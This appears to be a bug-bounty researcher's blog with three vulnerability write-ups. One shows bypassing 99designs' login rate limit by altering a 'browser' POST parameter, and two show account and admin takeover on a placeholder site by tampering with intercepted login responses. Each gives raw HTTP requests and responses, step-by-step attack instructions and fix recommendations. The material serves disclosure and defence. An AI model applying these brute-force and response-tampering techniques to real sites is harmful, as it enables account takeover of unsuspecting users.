A Way to Bypass Rate Limiting

Another Way to Bypass Rate Limiting

I want to share one of my finding on account.99designs.com which I have reported to them on 5th May 2014.

I have found that site.com

following Url https://account.99designs.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= was vulnerable to
Bruteforce attacks even when the Rate-Limting is implement for all the site.com users account and the server is disabling the requests.

So
first I tried to do the Status Code Value or Response Code Value, Length Code
Analysis but it was same as 200 for all Right & Wrong Password
attempts as we hit the 60 Wrong Password Attempts also the error message was generic for all Right & Wrong
Password Attempts.

Then
I tried to do the User-Agent based bruteforce attack by changing the
user-agent to known and anonymous user-agent in header of the each
request but it also failed and then after further more Deep Analysis I
found that there was a parameter named browser was sent using post
method in each request with Wrong or Right Password and this parameter
was containing a value which was the currently used browsers name i.e.
internet+explorer. So, that means the server was checking the User-Agent
using header and also using the browser name parameter and its value
internet+explorer.

So

to find weakness in the Rate Limiting countermeasure 1st sent more then
60 Wrong Password requests using  the browser parameter with the value
internet+explorer as the 60 Wrong Password requests sent the the Rate
Limiting got enabled and it started blocking the wrong or right password
request and was sending the response code and length code as 200 for all Right & Wrong Password
attempts also the error message was generic for all Right & Wrong
Password Attempts so again it failed. 



After
that I started sending each request with the browser named parameter
value which I changed to any known and also any unknown value as browser
name value. So, then I observed that after more then 60 Wrong Password
Attempts and also even after more then 10000 Wrong Passwords Attempts
the Rate Limiting didn't got enabled nor the Status Code Value or
Response Code Value, Length Code values changed to 200. Instead for
Right Password it was 302 and for Wrong Pass it was 200.



So,
in this way I was able to Bypass the site.com Rate Limting by changing the browser parameter value in each request and by analyzing
the Status Code Value or Response Code Value, Length Code values
differences.

Original Request:



POST
/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA=
HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie:
__iswl_account99designscom=0;
sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073;
sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F;
__ssid=69a7009e-a365-4481-87e3-60620271c47d;
CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH




Modified Request:



POST
/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA=
HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie:
__iswl_account99designscom=0;
sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073;
sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F;
__ssid=69a7009e-a365-4481-87e3-60620271c47d;
CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH



In this way the attacker was able to Bypass the Rate Limiting of 99designs.





Impact:

The attacker can
successfully bruteforce the passwords on any users account even when
the rate limiting is enabled and this can lead
to account compromise.

Recommendation:

The Length Code Value for Right & Wrong Passwords shall always be Same for Any Users Account.



Instead of user-agent based validation for enabling the rate limiting user id shall be checked for numbers of wrong password attempts.





The account shall only be unlocked using a email which contains a Un-Lock account link.

The vulnerability was mitigated by 99designs Security Team.

So in this way, one can
Bypass Rate Limiting and can also compromise the victims
account also this technique can be used to find same type of
vulnerabilities on different websites.



Suggestions and Feedback's are welcome.

Authentication Bypass & Privilege Escalation Using Header Manipulation & Cookie Injection

A Way to Bypass Authentication & Gain Admin Privilege Using Login Validation Process Prediction

While
researching and working on bug bounties in Feb 2013, I have found a way that Using Header Manipulation & Cookie Injection we can Bypass Authentication and can gain Admin Privilege and using this vulnerability we can Takeover all the
users account of a website if that site is vulnerable to this type of
attack.

Using

this vulnerability the attacker can predict the login validation
process for any admins account by combinding various techniques and in
this way he can also Bypass Authentication of
all passwords of all the Admin accounts and can successfully compromise the Admins account as the login validation process is predictable by the
attacker.



I tried various techniques to Bypass the
Login like Arbitrary Methods Usages, Cookies Manipulation, Status Code Value Modification, Response Code Modification but all
these techniques failed so the challenge was to understand the Login
Validation Process and to find a weakness in it. So now I am mentioning
how I was able to Bypass the Admin Authentication.

Please Note: There was a precondition that an attacker shall know the admins login email id only. This can be done using forget password or even using login Url itself.

Steps to Execute the Attack:

For login validation process analysis I created 2 test accounts.



1.
1st we will send the login request using our own account attackerloginid@testsite.com with a wrong password while intercepting the response for the wrong password using the below
mentioned login link.  



https://testsite.com/user/login



2. Using
which I found that
if the password is wrong then the server response code is 302 Found,
1st Set-Cookie named remember_email value is null and
2nd Set-Cookie named registration_status value is unregistereduser and the
Location header value is as site login page Url https://testsite.com/user/login.

3. Now we will send the login request using our own account attackerloginid@testsite.com with a right password while intercepting the response for the right password using the below
mentioned login link.  



https://testsite.com/user/login



4. Using
which I found that if the password is right then the server response code is 302 Found,
1st Set-Cookie named remember_email value is attackerloginid@testsite.com and
2nd Set-Cookie named registration_status value is registereduser and the
Location header value is as site Dashborad page Url https://testsite.com/user/accounts/dashboard.



5.
As now we are able to find the variation between the wrong and right
passwords server responses so we know we can Predict the Login
Validation Process for the right password for any victims account and also for the Admin account.



So in simple
words now the attacker will try to login into the victims account using
the login Url and victims user id or login email id which is victimloginid@testsite.com with a wrong password while intercepting the response using any web proxy and he will get the server response code as 302 Found with a 1st Set-Cookie named remember_email with null as value and 2nd Set-Cookie named registration_status with a unregistereduser as value and with the
Location header value as site Is User login page Url https://testsite.com/user/login.



So now the attacker will add the 1st Set-Cookie named remember_email with a victimloginid@testsite.com as value and 2nd Set-Cookie named registration_status with a registereduser as value and with the
Location header value as site User Dashboard page Url https://testsite.com/user/accounts/dashboard and forward the request using any web proxy, now the attacker successfully logs into the victims account.



Now to Bypass the Admins login Authentication in same way  the attacker will add the 1st Set-Cookie named remember_email with a adminloginid@testsite.com as value and 2nd Set-Cookie named registration_status with a registeredadmin
as value and with the
Location header value as site Admin Dashboard page Url https://testsite.com/admin/accounts/dashboard and forward the request
using any web proxy, now the attacker successfully logs into the Admins account and gains the Admin Privilege.



So in this way we can easily Bypass the Admin Authentication as well an Users Athentication :).

Key Points: registration_status cookie value unregistereduser is for a user with wrong password, registereduser id for a user with right password and registeredadmin is for the admin user with right password.


Attacker's Login ID: attackerloginid@testsite.com

Victim's Login ID: victimloginid@testsite.com

Admin's Login ID: adminloginid@testsite.com

Original Server Response Using Attacker's Account with Wrong Password:



HTTP/1.1 302 Found

Cache-Control: no-cache

Content-Type: text/html; charset=utf-8

Date: Tue, 15 Feb 2013 18:30:09 GMT

Location: https://testsite.com/user/login

Set-Cookie: remember_email=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT

Set-Cookie: registration_status=unregistereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT

Status: 302 Found

Vary: Accept-Encoding

X-Runtime: 95

Content-Length: 109

Connection: keep-alive



Original Response Using Attacker's Account with Right Password:



HTTP/1.1 302 Found

Cache-Control: no-cache

Content-Type: text/html; charset=utf-8

Date: Tue, 15 Feb 2013 18:32:22 GMT

Location: https://testsite.com/user/accounts/dashboard

Set-Cookie: remember_email=attackerloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT

Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT

Status: 302 Found

Vary: Accept-Encoding

X-Runtime: 95

Content-Length: 109

Connection: keep-alive





Modified
Response in which the attacker modified Set-Cookie
& its Value, Status, Location Header and its Value and Sent it as a Request to Bypass Victims Login:



HTTP/1.1 302 Found

Cache-Control: no-cache

Content-Type: text/html; charset=utf-8

Date: Tue, 15 Feb 2013 18:35:43 GMT

Location: https://testsite.com/user/accounts/dashboard

Set-Cookie: remember_email=victimloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT

Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT

Status: 302 Found

Vary: Accept-Encoding

X-Runtime: 95

Content-Length: 109

Connection: keep-alive

Modified
Response in which the attacker modified Set-Cookie
& its Value, Status, Location Header and its Value and Sent it as a Request to Bypass Victims Login:



HTTP/1.1 302 Found

Cache-Control: no-cache

Content-Type: text/html; charset=utf-8

Date: Tue, 15 Feb 2013 18:40:14 GMT

Location: https://testsite.com/admin/accounts/dashboard

Set-Cookie: remember_email=adminloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT

Set-Cookie: registration_status=registeredadmin; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT

Status: 302 Found

Vary: Accept-Encoding

X-Runtime: 95

Content-Length: 109

Connection: keep-alive

Impact: 

The Login Validation Process is Predictable using which an attacker can easily compromise Admins account and any other users account of the Application.

Recommendation:  

The
Login Validation shall not be dependent on Cookies Values and Location Header values combination and the Privileges shall not be granted on the basis of cookie values. Also
the it shall not be dependent on the Client-Side Validation instead
proper Server-Side Validation shall be done for the Correct Passwords.

So in this way one can Takeover or Bypass the authentication of Admins account as well as any users victims accounts using the Using Admin Login Validation Process Prediction also this way can be used
to find same type of
vulnerabilities on many different websites.

Suggestions and Feedbacks are welcome.

A Way to Bypass Authentication

Authentication Bypass Using Login Validation Process Prediction

While researching and working on bug bounties in late Dec 2012, I have found a way to Bypass Authentication  using which we can Takeover all the
users account of a website if that site is vulnerable to this type of
attack.

Using
this vulnerability the attacker can predict the login validation process for any victims account by combinding various techniques and in this way he can also Bypass Authentication of
all passwords of all the accounts and can successfully compromise the
victims account as the login validation process is predictable by the attacker.



I tried various techniques to Bypass the Login like Response Code Modification, Arbitrary Methods Usages but all these techniques failed so the challenge was to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass the Authentication.

Please Note: There was a precondition that an attacker shall now the victims login id or user id only.

Steps to Execute the Attack:

For login validation process analysis I created 2 test accounts.



1.
1st we will send the login request using our own account attackerloginid with a wrong password while intercepting the response for the wrong password using the below
mentioned login link.  



https://testsite.com/login.jsp



2. Using
which I found that
if the password is wrong then the server response code is 200 OK,
Set-Cookie named pstoken value is null which is generated once and the
status code value is json based as following {"failed":false}.

3. Now the we will send the login request using our own account attackerloginid with a right password while intercepting the response for the right password using the below
mentioned login link.  



https://testsite.com/login.jsp



4. Using
which I found that if the password is right then the server response code is 302 Found,
Set-Cookie named pstoken value is attackers user id or login id md5 hash value is 636559678682db9e21c958a4df44eea4 which is generated twice and the status code value is json
based as following {"success":true}.



5.
As now we are able to find the variation between the wrong and right passwords server responses so you now we can Predict the Login Validation Process for the right password.



So in simple words now the attacker will try to login into the victims account using the login Url and victims user id or login id which is victimloginid with a wrong password while intercepting the response using any web proxy and he will get the server response code as 200 OK with a
Set-Cookie named pstoken with a null value which is generated once and with a
status code value in json as following {"failed":false}.



So now the attacker will modify the response code value 200 OK to 302 Found, will add the Set-Cookie twice which is named as pstoken whose value he will change from null to victims user id or login id md5 hash value which is e9fc2abd9060fde1a67e3367b7d64bd0 and after that he will modify the status code value from {"failed":false} to {"success":true} and forward the request using any web proxy, now the attacker successfully logs into the victims account.



So in this way we can easily Bypass the Authentication :).

Attackers Login ID: attackerloginid md5 hash value:

636559678682db9e21c958a4df44eea4

Victims Login ID: victimloginid md5 hash value:

e9fc2abd9060fde1a67e3367b7d64bd0

Original Server Response Using Attackers Account with Wrong Password:



HTTP/1.1 200 OK

Date: Wed, 7 May 2014 21:17:27 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/

Content-Length: 16

Connection: close

Content-Type: text/html; charset=UTF-8



{"failed":false}





Original Response Using Attackers Account with Right Password:



HTTP/1.1 302 Found

Date: Wed,  7 May 2014 21:17:27 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/

Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/

Content-Length: 16

Connection: close

Content-Type: text/html; charset=UTF-8



{"success":true}



Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request:



HTTP/1.1 302 Found

Date: Wed, 7 May 2014 21:17:27 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/

Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/

Content-Length: 16

Connection: close

Content-Type: text/html; charset=UTF-8



{"success":true}

Impact: 

The Login Validation Process is Predictable using which an attacker can easily compromise any users account of the Application.

Recommendation:  

The Login Validation shall not be dependent on Response Code Values, Cookies Values and Json Based Status Code values etc combination. Also the it shall not be dependent on the Client-Side Validation instead proper Server-Side Validation shall be done for the Correct Passwords.

So in this way one can Takeover or Bypass the authentication of any victims accounts using the Using Login Validation Process Prediction also this way can be used
to find same type of
vulnerabilities on many different websites.

Suggestions and Feedbacks are welcome.